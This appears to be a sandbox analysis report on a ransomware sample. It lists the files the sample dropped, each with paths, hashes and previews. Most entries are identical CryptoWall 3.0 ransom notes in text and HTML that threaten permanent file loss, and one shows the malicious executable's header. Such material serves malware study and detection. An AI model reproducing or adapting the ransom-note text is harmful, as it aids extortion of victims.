                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\svcmtr.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\0t8amSU3vd.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):217109
                                                                                                                          Entropy (8bit):7.522628705686142
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:0/kdfrM7AyEfU60/IzCsRzxGmw5oCmK2fk7mzBW+g:aks60/KCs5vL9K2fk7mzBg
                                                                                                                          MD5:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          SHA1:1FA08E8CE2C70DAF4A3456EB53E48484B20D3D12
                                                                                                                          SHA-256:AD340C9EA5510D1F0F6149FAE0BD5349D6E8B01DF4ECCC9A2BB300BE4BC9D981
                                                                                                                          SHA-512:6847B69B8A9D913B46C1ABFB0F1BA91070999CDA1BD3DF6C8229CFDC4B052DC25102D2353548AB436F361083CF9BE5836F118AB508E2DEB3FFDBFDF286B847AA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be.(.. in DOS mode....$.........>...m...m...m..m..m..m...m...m...m...m..ma..m..ma..m...m...m...m...m...m...m...mRich...m................PE..L....FuC..........................................@.........................................................................D...........................................................................................4............................text..."........................... ..`.rdata..............................@..@.data....P... ... ... ..............@....rsrc................@..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\Documents\Recovery_File_rnhjl.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):249
                                                                                                                          Entropy (8bit):4.534104668428901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:fm0P3d2jyyj/o/+5dk0TvUdARUPv2neB6y1daK7vvqb1tsShHHGgRUgjuqtv:7tNyj/0+Dv7EARUie0y1daaXqzxbRUgP
                                                                                                                          MD5:20C4ED049DDCEEA6F2E202B41C485B6E
                                                                                                                          SHA1:4ABEA7FFFF723AE300AAD4B2A630FF30896EE960
                                                                                                                          SHA-256:09C3EF5F09267A2A01F39AE47E7CD3A73EC421274E6C68F9411DA2130BB9F0B9
                                                                                                                          SHA-512:658D7A9BDFF130B8D362C1EC215F1D943B42C9CF60F209148F895C2F9D33255D24A03F7885F9BD6068B42B3B0DBBA152C0899BBF1C430AAE7F03DA4F265953C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB..B0894A6F5E3AA8A1CB5A3E6FD5BA56AC18E75483FFB78E021E3937EBEEED2A42..30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC..E722D94C1CAC34B..

                                                                                                                          C:\Users\user\Recent\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\Recent\restore_files_gpmus.txt

